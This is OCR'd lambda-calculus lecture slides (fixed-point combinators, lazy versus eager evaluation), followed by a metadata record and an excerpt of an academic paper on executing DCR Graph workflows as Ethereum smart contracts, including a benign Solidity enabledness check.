In Other Words - The Y combinator “unrolls” or “unfolds” its argument an infinite number of times - \( Y \ G = G \ (Y \ G) = G \ (G \ (Y \ G)) = G \ (G \ (G \ (Y \ G))) = \ldots \) - \( G \) needs to have a “base case” to ensure termination - Sufficient to encode arbitrary recursion - But, only works because we’re call-by-name - Different combinator(s) for call-by-value - \( Z = \lambda f. (\lambda x. f \ (\lambda y. x \ x \ y)) \ (\lambda x. f \ (\lambda y. x \ x \ y)) \) - Why is this a fixed-point combinator? How does its difference from \( Y \) make it work for call-by-value? Encodings - Encodings are fun; they show language expressiveness - In practice, we usually add constructs as primitives - Much more efficient - Much easier to perform program analysis on and avoid silly mistakes with - E.g., our encodings of true and 0 are exactly the same, but we may want to forbid mixing booleans and integers Lazy vs. Eager Evaluation • Our non-deterministic reduction rule is fine for theory, but awkward to implement • Two deterministic strategies: ▪ Lazy: Given \((\lambda x. e_1) \ e_2\), do not evaluate \(e_2\) if \(e_1\) does not “need” \(x\) - Also called left-most, call-by-name, call-by-need, normal-order (with slightly different meanings) ▪ Eager: Given \((\lambda x. e_1) \ e_2\), always evaluate \(e_2\) fully before applying the function - Also called call-by-value Lazy (Big-Step) Operational Semantics \[ (\lambda x. e_1) \rightarrow^l (\lambda x. e_1) \qquad \frac{e_1 \rightarrow^l \lambda x. e \quad e[e_2/x] \rightarrow^l e'}{e_1 \ e_2 \rightarrow^l e'} \] • The rules are deterministic • The rules do not reduce under \(\lambda\) • The rules are normalizing: ▪ If \(a\) is closed and there is a normal form \(b\) such that \(a \rightarrow^* b\), then \(a \rightarrow^l d\) for some \(d\) Eager (Big-Step) Operational Semantics \[ (\lambda x. e_1) \rightarrow^e (\lambda x. e_1) \qquad \frac{e_1 \rightarrow^e \lambda x. e \quad e_2 \rightarrow^e e' \quad e[e'/x] \rightarrow^e e''}{e_1 \ e_2 \rightarrow^e e''} \] - This semantics is also deterministic and does not reduce under \(\lambda\) - But it is not normalizing - Example: let \(x = \Delta \ \Delta\) in \((\lambda y. y)\) Lazy vs. Eager in Practice - Lazy evaluation (call by name, call by need) - Has some nice theoretical properties - Terminates more often - Lets you play some tricks with “infinite” objects - Main example: Haskell - Eager evaluation (call by value) - Is generally easier to implement efficiently - Blends more easily with side effects - Main examples: Most languages (C, Java, ML, etc.)
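To make the encodings and the call-by-value fixed point concrete, here is a small sketch (not from the original slides) using ordinary Python closures. Python is eager, so the Y combinator above would diverge here, while the slide's Z combinator works; the names TRUE, ZERO, Z, and G mirror the definitions above, and for brevity the factorial body uses native integers rather than fully Church-encoded arithmetic.

```python
# Church booleans and numerals as ordinary Python lambdas, plus the
# call-by-value fixed-point combinator Z. The eta-expansion in Z delays
# the self-application, which is what makes it terminate under CBV.
TRUE  = lambda x: lambda y: x
FALSE = lambda x: lambda y: y
IF    = lambda p: lambda a: lambda b: p(a)(b)

ZERO  = lambda f: lambda x: x
SUCC  = lambda n: lambda f: lambda x: f(n(f)(x))

def to_int(n):                       # decode a Church numeral for printing
    return n(lambda k: k + 1)(0)

# Z = \f. (\x. f (\y. x x y)) (\x. f (\y. x x y))
Z = lambda f: (lambda x: f(lambda y: x(x)(y)))(lambda x: f(lambda y: x(x)(y)))

# G = \fact. \n. if n = 0 then 1 else n * fact(n - 1), with native integers
G = lambda fact: lambda n: 1 if n == 0 else n * fact(n - 1)
factorial = Z(G)

print(to_int(SUCC(SUCC(ZERO))))      # 2
print(IF(TRUE)(1)(2))                # 1 (both branches are still evaluated eagerly)
print(factorial(5))                  # 120
```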
Functional Programming - The \( \lambda \) calculus is a prototypical functional programming language: - Lots of higher-order functions - No side-effects - In practice, many functional programming languages are “impure” and permit side-effects - But you’re supposed to avoid using them Influence of Functional Programming - Functional ideas in many other languages - Garbage collection was first designed for Lisp; many languages now rely on a GC - Generics in Java/C++ came from polymorphism in ML and from type classes in Haskell - Higher-order functions and closures (used widely in Ruby; proposed extension to Java) are pervasive in all functional languages - Many data abstraction principles of OO came from ML’s module system - … Call-by-Name Example **OCaml** ```ocaml let cond p x y = if p then x else y let rec loop () = loop () let z = cond true 42 (loop ()) ``` *infinite loop at the call* **Haskell** ```haskell cond p x y = if p then x else y loop () = loop () z = cond True 42 (loop ()) ``` *3rd argument never used by cond, so never invoked* Two Cool Things to Do with CBN - Build control structures with functions ``` cond p x y = if p then x else y ``` - “Infinite” data structures ``` integers n = n : integers (n+1) take 10 (integers 0) -- infinite loop in CBV ```
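A rough call-by-need analogue of the final Haskell example, sketched with a Python generator so that the "infinite" list is only produced on demand (an illustration, not part of the slides; `integers` and `take` are hypothetical counterparts of the Haskell definitions above):

```python
from itertools import count, islice

# "integers n = n : integers (n+1)" with elements produced lazily, on demand.
def integers(n):
    while True:
        yield n
        n += 1

def take(k, xs):
    return list(islice(xs, k))       # force only the first k elements

print(take(10, integers(0)))         # [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
print(take(5, count(100)))           # itertools.count is the library equivalent
```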
{"Source-Url": "https://www.cs.umd.edu/class/fall2007/cmsc631/lectures/lambda.pdf", "len_cl100k_base": 4802, "olmocr-version": "0.1.49", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 39783, "total-output-tokens": 5959, "length": "2e12", "weborganizer": {"__label__adult": 0.00043892860412597656, "__label__art_design": 0.00039768218994140625, "__label__crime_law": 0.00037217140197753906, "__label__education_jobs": 0.0025806427001953125, "__label__entertainment": 9.453296661376952e-05, "__label__fashion_beauty": 0.000186920166015625, "__label__finance_business": 0.00023746490478515625, "__label__food_dining": 0.0005750656127929688, "__label__games": 0.000576019287109375, "__label__hardware": 0.0010280609130859375, "__label__health": 0.0008769035339355469, "__label__history": 0.000347137451171875, "__label__home_hobbies": 0.00017559528350830078, "__label__industrial": 0.0006809234619140625, "__label__literature": 0.0004420280456542969, "__label__politics": 0.00035381317138671875, "__label__religion": 0.0007581710815429688, "__label__science_tech": 0.043975830078125, "__label__social_life": 0.00018024444580078125, "__label__software": 0.0035610198974609375, "__label__software_dev": 0.9404296875, "__label__sports_fitness": 0.0005502700805664062, "__label__transportation": 0.0008025169372558594, "__label__travel": 0.00025200843811035156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 14800, 0.01284]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 14800, 0.85873]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 14800, 0.6956]], "google_gemma-3-12b-it_contains_pii": [[0, 347, false], [347, 886, null], [886, 1571, null], [1571, 2241, null], [2241, 2904, null], [2904, 3525, null], [3525, 4174, null], [4174, 5170, null], [5170, 5839, null], [5839, 6538, null], [6538, 7199, null], [7199, 7660, null], [7660, 8549, null], [8549, 9308, null], [9308, 10792, null], [10792, 11740, null], [11740, 12703, null], [12703, 13464, null], [13464, 14229, null], [14229, 14800, null]], "google_gemma-3-12b-it_is_public_document": [[0, 347, true], [347, 886, null], [886, 1571, null], [1571, 2241, null], [2241, 2904, null], [2904, 3525, null], [3525, 4174, null], [4174, 5170, null], [5170, 5839, null], [5839, 6538, null], [6538, 7199, null], [7199, 7660, null], [7660, 8549, null], [8549, 9308, null], [9308, 10792, null], [10792, 11740, null], [11740, 12703, null], [12703, 13464, null], [13464, 14229, null], [14229, 14800, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 14800, null]], "pdf_page_numbers": [[0, 347, 1], [347, 886, 2], [886, 
1571, 3], [1571, 2241, 4], [2241, 2904, 5], [2904, 3525, 6], [3525, 4174, 7], [4174, 5170, 8], [5170, 5839, 9], [5839, 6538, 10], [6538, 7199, 11], [7199, 7660, 12], [7660, 8549, 13], [8549, 9308, 14], [9308, 10792, 15], [10792, 11740, 16], [11740, 12703, 17], [12703, 13464, 18], [13464, 14229, 19], [14229, 14800, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 14800, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
f5bbdb0d0d2053717c9f56b62b29e6d443e7db6c
Collaboration among Adversaries Madsen, Mads Frederik; Gaub, Mikkel; Høgnason, Tróndur; Kirkbro, Malthe Ettrup; Slaats, Tijs; Debois, Søren Publication date: 2018 Document Version Publisher's PDF, also known as Version of record Citation for published version (APA): Collaboration among Adversaries: Distributed Workflow Execution on a Blockchain Mads Frederik Madsen IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark mfrm@itu.dk Mikkel Gaub IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark mikg@itu.dk Tróndur Høgnason IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark thgn@itu.dk Malthe Ettrup Kirkbro IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark maek@itu.dk Tijs Slaats University of Copenhagen Emil Holms Kanal 6 2300 Copenhagen S, Denmark slaats@di.ku.dk Søren Debois IT University of Copenhagen Rued Langgaards Vej 7 2300 Copenhagen S, Denmark debois@itu.dk ABSTRACT We study distributed declarative workflow execution in an adversarial setting. In this setting, parties to an agreed-upon workflow do not trust each other to follow that workflow, or suspect the other party might misrepresent proceedings at a later time. We demonstrate how distributed declarative workflow execution can be implemented as smart contracts, guaranteeing (I) enforcement of workflow semantics, and (II) an incontrovertible record of workflow execution history. Crucially, we achieve both properties without relying on a trusted third party. The implementation is based on the Ethereum blockchain, inheriting the security properties (I) and (II) from the guarantees given by that chain. A recurring challenge for both the implementation and the analysis is the cost of operations on Ethereum: This cost must be minimised for honest parties, and an adversary must be prevented from inflicting extra cost on others. 1. INTRODUCTION Mutually distrusting organisations must often collaborate, as illustrated by the following example. On the Danish labour market, employer-employee disputes are resolved not by the parties themselves, but by the umbrella organisations for respectively Danish employers (abbreviated here “DE”) and Danish unions (abbreviated here “DU”). A dispute may be resolved through negotiations between the two parties, or, if negotiations break down, in court. Given their conflicting interests, DU and DE are mutually distrusting collaborators. They follow an agreed-upon process when negotiating a dispute, a process which defines simple things like who proposes meeting dates, who submits which document to whom and how, etc. However, depending on the strength of their respective cases, they may not have equal incentives to follow this process. If an employee has a strong claim to unpaid salary, DE may be less forthcoming in responding to meeting date proposals. Conversely, if an employer is planning legal but unpleasant mass firings, DU may similarly stall the process. Should a case go to court, either party’s intransigence may have legal repercussions. This reluctant collaboration is an example of a cross-organisational workflow between adversaries. System support for such a workflow must provide two key guarantees: (I) **Workflow correctness.** The system must enforce the agreed-upon workflow, so that no party can obtain an advantage by acting out of turn or failing to fulfil an obligation to act.
(II) **Consensus on history.** The system must provide an incontrovertible record of execution, e.g., to decide in court which party did in fact violate the agreed-upon workflow. The usual way to achieve (I) and (II) is having participants agree on a trusted third party. This third party verifies that the actions taken are within the bounds of the agreement, and meticulously records the proceeding of the case. However, such a third party is not always practical: It may be difficult for the parties to agree on one, and it may be expensive to retain one, especially at large case volumes. In this paper, we show how (I) and (II) may be achieved without a trusted third party by implementing an executable workflow specification as an Ethereum smart contract. Our solution is based on recent advances in executable workflow specifications on the one hand and blockchain technologies on the other. A blockchain can be used as a mechanism to produce a trusted, immutable record of workflow execution. E.g., if DU and DE were to store the history of their common processes on a blockchain, they could both trust this history to be correct with very high probability. **Executable workflow specifications.** Agreeing on a record of workflow history is only a part of the puzzle. We must also enforce adherence to the agreed-upon workflow, i.e., the rules governing the exact order in which work can be done. Instead of encoding a workflow directly as a part of the source code of the system, it is typically modelled separately in a *workflow notation* such as BPMN [32], Workflow Nets [1], DECLARE [39], DCR graphs [7, 10], GSM [24], or CMMN [31]. In the best case, such a model is executed by an execution engine embedded in the overall system, enabling straightforward adaptation of work practices by changing the model rather than redeveloping the system itself. Traditionally, workflow notations have been flow-based, describing processes in a style similar to transition systems, representing precisely the steps that one may go through to satisfy the goals of the process. Such notations work well for strict production processes with little variation, but when applying them to knowledge intensive processes [11], which usually allow a large degree of flexibility and many different paths towards the goals of the process, the models tend to become overly complex and unreadable [39]. Declarative process notations [39, 19, 31, 38] address this deficiency by capturing not explicit flow but rather the constraints and goals of a process, letting the system deduce the allowed paths to the goal. As shown in [20], the declarative approach is highly relevant in the case of DU and DE, whose processes are strongly knowledge intensive. A declarative process model may be implemented as a *smart contract* [36, 40]: a blockchain where blocks represent not only a common history, but also contracts in the form of executable code. For example, DU and DE have agreed that DU will always propose meetings first; encoding this rule in a smart contract, we can ensure that any attempts to add new events in violation of this rule are rejected. **Contributions.** We show that a declarative workflow engine can be employed in an adversarial setting by embedding it on a blockchain as smart contracts. We demonstrate how this approach can be implemented in practice on the Ethereum Virtual Machine (EVM), in which each operation has an associated cost denoted in *Gas*. 
Once the sum of Gas has been calculated for an execution, it is paid for in the Ethereum cryptocurrency Ether by the user calling the code, at an Ether/Gas rate specified by that user. This rate allows miners to prioritise those calls paying the most. The EVM is in principle Turing-complete [42]. However, all computations are in practice finite, limited by the amount of Gas that a caller is willing to spend. Ethereum allows one to verify the existence of specific source code on the blockchain, whether it has been run, and whether a run was completed successfully or not. Moreover, Ethereum certifies that code was executed as specified, and that only authorised parties execute contract calls [42, 40]. This means that when implementing workflows as smart contracts, any participant can be certain that the source code is unchanged and that every execution is validated with respect to both the contract logic and execution rights. Like the Bitcoin blockchain, the Ethereum blockchain relies on mining being hard to ensure that the probability of an attacker overtaking the main chain, rewriting history, is low. However, whereas the Bitcoin blockchain and its variants have seen work on analysing under what circumstances and with what probabilities that might happen [3, 27, 35, 26, 6, 2, 37, 18], we are unaware of similar analyses for Ethereum. 3. DCR GRAPHS In this Section, we recall DCR Graphs, a vehicle for specifying admissible sequences of event executions. A DCR Graph specifies an "agreed-upon" workflow, where the events are the activities of the workflow. A DCR Graph comprises events (nodes) and relations between events (edges); events have state which is recorded in a marking. Relations indicate how executability of one event may depend on the states of others, and how execution changes such states. **Definition 1** (DCR Graph [19]). A DCR Graph is a tuple \((E, R, M)\) where - \(E\) is a finite set of events, the nodes of the graph. - \(R\) is the edges of the graph. Edges are partitioned into five kinds: conditions \((\rightarrow\bullet)\), responses \((\bullet\rightarrow)\), milestones \((\rightarrow\diamond)\), inclusions \((\rightarrow+)\), and exclusions \((\rightarrow\%)\). - \(M\) is the marking of the graph, a triple \((Ex, Re, In)\) of sets of events, respectively the previously executed \((Ex)\), the currently pending \((Re)\), and the currently included \((In)\) events. When \(G\) is a DCR Graph, we write, e.g., \(E(G)\) for the set of events of \(G\), as well as, e.g., \(Ex(G)\) for the executed events in the marking of \(G\). We give in Figure 1 an excerpt of the workflow of DU and DE reported in [20]. The events are nodes in the graph; the marking of each event is shown graphically: *Hold Meeting* is pending, viz. the blue exclamation mark; both *Accept* events are excluded, viz. the dashed border. ![Figure 1: The DU/DE example—a DCR model of a cross-organisational workflow](image) By default, every activity may execute any number of times. We regulate the sequencing of such activity executions by adding relations between activities. There are five such relations: three which mutate the state of some events when another executes, and two which constrain the ability of one event to execute depending on the state of others. 3.1 Execution of Events To specify what happens when an event executes, we have the response, inclusion, and exclusion relations. First, the response. When either DE or DU proposes a date, the other is required to eventually accept one.
The blue responses \((\bullet\rightarrow)\) from Propose - DU to Accept - DE and Propose - DE to Accept - DU model this requirement: Executing the first event makes the second event pending. The red exclusions \((\rightarrow\%)\) temporarily remove events from the process. This can be both an event removing itself after being executed, as is the case for each instance of Accept, or an event removing another event, exemplified by Accept - DU removing Accept - DE and vice versa. We say that such a removed event is excluded, indicated by a dashed border, as seen in the two Accept events. Exclusions are dynamic and may be reverted: When DU or DE proposes new dates, the other is expected to accept these dates again. This is modelled through the green inclusions \((\rightarrow+)\) from Propose - DU to Accept - DE and Propose - DE to Accept - DU. Because Accept - DU and Accept - DE are excluded (dashed border), either requires its including event to happen before it can itself happen. We formalise the notion of executing an event. **Definition 2** (Execution [19]). Let \(G = (E, R, M)\) be a DCR Graph with marking \(M = (Ex, Re, In)\). If we execute an event \(e \in E\), we obtain the resulting DCR graph \((E, R, M')\) with \(M' = (Ex', Re', In')\) defined as follows. 1. \(Ex' = Ex \cup e\) 2. \(Re' = (Re \setminus e) \cup (e \bullet\rightarrow)\) 3. \(In' = (In \setminus (e \rightarrow\%)) \cup (e \rightarrow+)\) That is, to execute an event \(e\) one must: (1) add \(e\) to the set \(Ex\) of executed events; (2) update the currently required responses \(Re\) by first removing \(e\), then adding any responses required by \(e\); and (3) update the currently included events by first removing all those excluded by \(e\), then adding all those included by \(e\). 3.2 Enabled Events Not all events in a graph are necessarily allowed to execute. To specify which events are in fact executable we have conditions and milestones. A condition indicates that when the source is included but not executed, the target cannot execute. For example, by convention, DU is always the first to propose dates. This is modelled by the condition relation \((\rightarrow\bullet)\) between Propose - DU and Propose - DE. When dates have been proposed but not yet accepted, the meeting cannot be held. The milestone relations \((\rightarrow\diamond)\) from Accept - DU and Accept - DE to *Hold Meeting* ensure this: a milestone indicates that whenever the source is included and pending, the target cannot execute. In the diagram, the Accept events are not yet pending; this is intentional: DU and DE may skip proposing dates and hold ad hoc meetings. Unlike the condition relation, an event constrained by a milestone can become blocked again. In our example, if a date was accepted but later new dates are proposed, accepting dates becomes pending again, blocking *Hold Meeting*. We give formal meaning to these relations. **Definition 3** (Enabled Events [19]). Suppose \(G = (E, R, M)\) is a DCR Graph with marking \(M = (Ex, Re, In)\). We say that an event \(e \in E\) is enabled and write \(e \in enabled(G)\) iff (a) \(e \in In\), (b) \(In \cap (\rightarrow\bullet e) \subseteq Ex\), and (c) \(In \cap (\rightarrow\diamond e) \subseteq E \setminus Re\). That is, enabled events (a) are included, (b) have their included conditions already executed, and (c) have no included pending milestones. The enabled events for the DCR Graph in Figure 1 are Propose - DU and Hold Meeting.
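Definitions 2 and 3 translate almost directly into code. The following is a minimal Python sketch (an illustration only; the paper's actual implementation is written as Solidity smart contracts, discussed in Section 4) that encodes the relations and marking of the DU/DE excerpt in Figure 1 and reproduces the enabled events stated above.

```python
from dataclasses import dataclass, field

# Relations are stored per source/target as dictionaries of sets; the event
# names follow Figure 1. This mirrors Definitions 1-3, nothing more.
@dataclass
class DCRGraph:
    events: set
    conditions: dict            # target -> set of condition sources  (s ->• t)
    milestones: dict            # target -> set of milestone sources  (s ->◇ t)
    responses: dict             # source -> set of response targets   (s •-> t)
    includes: dict              # source -> set of inclusion targets  (s ->+ t)
    excludes: dict              # source -> set of exclusion targets  (s ->% t)
    executed: set = field(default_factory=set)    # Ex
    pending: set = field(default_factory=set)     # Re
    included: set = field(default_factory=set)    # In

    def enabled(self, e):
        """Definition 3: included, included conditions executed, no included pending milestones."""
        return (e in self.included
                and (self.included & self.conditions.get(e, set())) <= self.executed
                and not (self.included & self.milestones.get(e, set()) & self.pending))

    def execute(self, e):
        """Definition 2: update the marking (Ex, Re, In) after executing e."""
        if not self.enabled(e):
            raise ValueError(f"{e} is not enabled")
        self.executed |= {e}
        self.pending = (self.pending - {e}) | self.responses.get(e, set())
        self.included = (self.included - self.excludes.get(e, set())) | self.includes.get(e, set())

# The DU/DE excerpt of Figure 1.
E = {"Propose-DU", "Propose-DE", "Accept-DU", "Accept-DE", "Hold Meeting"}
g = DCRGraph(
    events=E,
    conditions={"Propose-DE": {"Propose-DU"}},
    milestones={"Hold Meeting": {"Accept-DU", "Accept-DE"}},
    responses={"Propose-DU": {"Accept-DE"}, "Propose-DE": {"Accept-DU"}},
    includes={"Propose-DU": {"Accept-DE"}, "Propose-DE": {"Accept-DU"}},
    excludes={"Accept-DU": {"Accept-DU", "Accept-DE"},
              "Accept-DE": {"Accept-DU", "Accept-DE"}},
    included=E - {"Accept-DU", "Accept-DE"},      # the Accept events start excluded
    pending={"Hold Meeting"},                     # Hold Meeting starts pending
)

print(sorted(e for e in E if g.enabled(e)))   # ['Hold Meeting', 'Propose-DU']
g.execute("Propose-DU")                       # includes Accept-DE and makes it pending
print(g.enabled("Hold Meeting"))              # False: included pending milestone Accept-DE
```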
General DCR Graphs have labelled events, allowing distinct events to exhibit the same observable activity, a detail we have elided in the current paper. In the general case, DCR Graphs express the union of regular and \( \omega \)-regular languages [10].

### 3.3 Distributed DCR Graphs

Distributed implementations of DCR Graphs were studied in [22] and [9]. In both cases, the core idea is that workflows are partitioned into subsets of events, with each participant owning a particular subset. The owner of an event is responsible for maintaining the marking (\( M \), Definition 1) of that event. Moreover, only the owner of an event can execute it (Definition 2).

Since executing one event may modify others via exclusion, inclusion and response arrows (Definition 2), whenever a party executes an event, it may have to notify owners of affected events. E.g., in the DU/DE example (Figure 1), events are naturally owned by either DU or DE as indicated at the top of each event. The event Propose - DU is owned by DU and so can only be executed by DU; however, executing this event includes the event Accept - DE, and so DU must notify DE whenever it executes Propose - DU, in order that DE may toggle the state of Accept - DE to included.

Similarly, before executing an event, the owner must verify that the event is enabled (see Definition 3). Whether an event is enabled is a function of the marking of other events via condition or milestone relations, hence the owner may have to query owners of such other events. E.g., in the DU/DE example, DE cannot execute Propose - DE before querying DU about the state of Propose - DU, because of the condition relation from the latter to the former. As queries for enabledness may interleave with effects of an execution, distributed implementations of DCR Graphs generally need some form of concurrency control [9].

### 4. DISTRIBUTED DCR GRAPHS AS ETHEREUM SMART CONTRACTS

In this section, we consider in the abstract an implementation of distributed DCR Graphs as Ethereum smart contracts. We shall see how such an implementation achieves the goals (I) and (II) of Section 1 provided an adversary has no feasible attack on the Ethereum blockchain. The naive implementation of DCR Graphs as Ethereum smart contracts is to simply implement a contract comprising a DCR Graph (Definition 1) represented as an Ethereum data structure, and calls for computing execution and enabled events (Definitions 2 and 3). Only the owner of an event has access rights to execute that event. This appealingly simple idea turns out to mask considerable pitfalls, in particular regarding who bears the cost of executing that call. In this section, we analyse this situation.

### 4.1 Cost of Relations

Previous treatments of distributed DCR graphs [9, 22] do not emphasise ownership of relations. Adding a relation to a DCR Graph induces additional computation in either enabledness (condition, milestone) or effect of execution (inclusion, exclusion, response). On Ethereum, additional computation translates directly to additional cost, so an adversary can inflict cost on honest parties if he can add new relations. For example, adding 100 distinct conditions \( A_i \rightarrow\bullet X \) to some event \( X \) would increase the cost of computing enabledness of \( X \) by 100 additional checks of whether each \( A_i \) is executed or excluded.

![Figure 2: Inter-workflow relations](image)

For conditions and milestones, each such relation induces computational cost at the owner of the target event.
For example, in Figure 2, Workflow 2 must consult Workflow 1 to learn the state of \( A \) before it can execute event \( C \). In general, adding an incoming relation such as \( A \rightarrow\bullet C \) increases the cost of computing enabledness of its target \( C \). To avoid cost-inflicting attacks, only the owner of the target \( C \) should be allowed to add incoming relations to it. However, because executing \( D \) requires an update of the state of \( B \), if that update is to be performed by the owner of \( B \), there is again an opportunity for an adversary to inflict cost. In that case, we must again require that only the owner of \( B \) and \( D \) jointly may add relations. We summarise where adding relations incurs cost in Table 1.

<table>
<thead>
<tr>
<th>Added relation</th>
<th>cost on A</th>
<th>cost on B</th>
</tr>
</thead>
<tbody>
<tr>
<td>( A \rightarrow B )</td>
<td>✓</td>
<td></td>
</tr>
<tr>
<td>( A \rightarrow B )</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>( A \rightarrow% B )</td>
<td>✓</td>
<td>✓</td>
</tr>
<tr>
<td>( A \rightarrow B )</td>
<td>✓</td>
<td>✓</td>
</tr>
</tbody>
</table>

Table 1: Incurred cost of added relations

### 4.2 Correctness

In general, adding relations to a workflow can make that workflow both more and less restrictive [8, 10]. For example, in Figure 2, the condition relation (top) means that Workflow 2 must wait for Workflow 1 to execute \( A \) before it can execute activity \( C \). If we imagine we have just added that condition, the new combined workflow has less behaviour than the old one, but no new behaviour. Thus, an adversary who can add relations can mount a potential denial-of-service attack by adding enough relations that the resulting combined workflow has no behaviour left.

Conversely, adding inclusions and exclusions can make a workflow less restrictive [8]. Without the inclusion relation (bottom) in Figure 2, Workflow 1 can never execute activity $B$. If we imagine we have just added that inclusion, the new combined workflow has more behaviour than the original one, since the new one admits the sequence $DB$ which the old one did not. This means that an adversary who can add relations can violate correctness of the original workflow. E.g., if the activity $B$ were “pay out lump sum”, the adversary has successfully orchestrated a payout in violation of the original workflow policy.

Assume a correct implementation of (1) the computation of enabled events and (2) the effect of executing an event in Solidity. Assume moreover that this implementation is used for implementing the distributed workflow in such a way that each party to the workflow can execute only the events they own, and only when these events are enabled. In this case, running this implementation on Ethereum, we get an implementation of the workflow which automatically achieves the goals of workflow correctness (I) and consensus on history (II), provided the adversary cannot produce valid blocks fast enough to outpace the Ethereum miner network.

Note that in workflows with more than two participants, we do not preclude colluding actors within the bounds of concurrent workflow semantics. In such a workflow, two or more participants could mount a denial-of-service attack against other participants by coordinating executions of activities in the same block, thereby skipping states in which specific activities were enabled. This is an inherent consequence of allowing concurrent executions of activities in DCR Graphs, and not a violation of workflow correctness (I).
5. COST REDUCTIONS

Our practical experiments have revealed two major insights about executing DCR Graphs on Ethereum:

1. It is indeed feasible to implement distributed workflows in an adversarial setting on the Ethereum blockchain.
2. However, to keep costs manageable, our implementation must take some counter-intuitive design decisions, including implementing only one contract and implementing set operations as bitvectors.

DCR Graphs as presented in Section 3 are simple enough that the core data structures (relations and markings, Definition 1) as well as operations on them (execution and enabledness, Definitions 2 and 3) are straightforward to implement in contemporary programming languages. A naive implementation creates an Ethereum contract for each workflow instance, representing marking and relations using standard data structures. This naive implementation has two shortcomings:

1. The Gas costs of Ethereum are dominated by the price of creating a smart contract, which is an order of magnitude more expensive than other operations [42].
2. The cost of computing enabledness (respectively, execution) grows linearly with the number of incoming (respectively, outgoing) relations.

5.1 RELATIONS

To reduce the impact of additional relations on the cost of computing enabledness and execution, we exploit that the core EVM datatype is a 256-bit value, noting that the core operations of DCR Graphs (Definitions 2 and 3) are all simple set-manipulations and can be implemented efficiently as bit vectors. Our prototype for this reason assumes at most 256 events in a DCR Graph, an assumption that is both practically reasonable [29, 34], and straightforward to remove if necessary. For such fixed-size bit vectors, we get an upper bound on the cost of executing an activity: execution is implemented as a static check of the legality of the execution, followed by 3 bitwise operations between bit vectors representing relations. We give the implementation of the enabledness computation in Listing 1; we encourage the reader to compare that listing, in particular lines 16, 20–21, and 25–27, to clauses (a)–(c) in Definition 3.

```solidity
function canExecute(uint256 wfId, uint256 activity) public constant returns (bool) {
    var workflow = workflows[wfId];
    uint32 i;

    // sender address must have execute rights
    for (i = 0; i < workflow.authAccounts.length; i++)
        if (workflow.authAccounts[i] == msg.sender)
            break; // sender authorised
    if (i == workflow.authAccounts.length)
        return false; // sender not authorised

    // activity must be included --- Def. 3(a)
    if ((workflow.included & (1 << activity)) == 0)
        return false;

    // all included conditions executed --- Def. 3(b)
    if ((workflow.conditionsFrom[activity] & (~workflow.executed & workflow.included)) != 0)
        return false;

    // no included milestones pending --- Def. 3(c)
    if ((workflow.milestonesFrom[activity] & (workflow.pending & workflow.included)) != 0)
        return false;

    return true;
}
```

Listing 1: Enabled computation

Besides the optimisations we have mentioned so far, our prototype implementation uses additional tricks to minimise Gas costs, notably packing call data to conserve storage space. We refer the interested reader to [17], which contains additional implementation detail. As mentioned in Section 2, execution of Ethereum smart contracts is paid for by setting an exchange rate between Gas, the cost of execution instructions, and the cryptocurrency Ether. We compare the cost of the naive and optimised implementations in Table 2.
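To complement Listing 1, here is a hedged sketch (in OCaml rather than Solidity) of how the effect of execution from Definition 2 becomes a handful of bitwise operations once markings and relation rows are packed into words; it assumes at most 63 events so that a native OCaml int suffices, whereas the prototype works with the EVM's 256-bit words, and the field names are ours.

```ocaml
(* Bit i is set iff event i is in the corresponding set. *)
type marking = { executed : int; pending : int; included : int }

(* Outgoing relation rows of the event being executed (illustrative names). *)
type row = { responses : int; includes : int; excludes : int }

(* Definition 2, one bitwise update per clause. *)
let execute (m : marking) ~(event : int) (r : row) : marking =
  let bit = 1 lsl event in
  { executed = m.executed lor bit;                                  (* Ex' = Ex ∪ {e}            *)
    pending  = (m.pending land (lnot bit)) lor r.responses;         (* Re' = (Re \ {e}) ∪ (e •→)  *)
    included = (m.included land (lnot r.excludes)) lor r.includes } (* In' = (In \ (e →%)) ∪ (e →+) *)
```

The cost of this update is independent of how many events the relations mention, which is what yields the fixed per-execution bound discussed in the text.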
Note that the cost of executing some activities actually increases from the naive to the optimised implementation: the bit vector implementation gives lower Gas cost on execution only when events have many relations. The DU/DE example is too small to exhibit this effect; however, practical workflows tend to have many more relations [21].

5.2 Contract Creation & Access Control

The cost of creating an instance of the DU/DE example workflow is given in Table 2, column “Naive”. Notice that creating the contract (“initialisation”) is two orders of magnitude more expensive than subsequent event executions. To reduce this cost, we propose a mono-contract implementation, that is, a single contract which hosts all workflows, and new workflows can be added at any point after contract creation. In this mono-contract implementation, methods each take an index of the workflow to work on. In such a setting, the cost overhead for creating a contract is incurred only once\(^2\): As subsequent workflows are hosted by this single contract, the cost of creating a contract does not reoccur. The cost of constructing a new workflow is reduced substantially; see the column “Optimised” in Table 2.

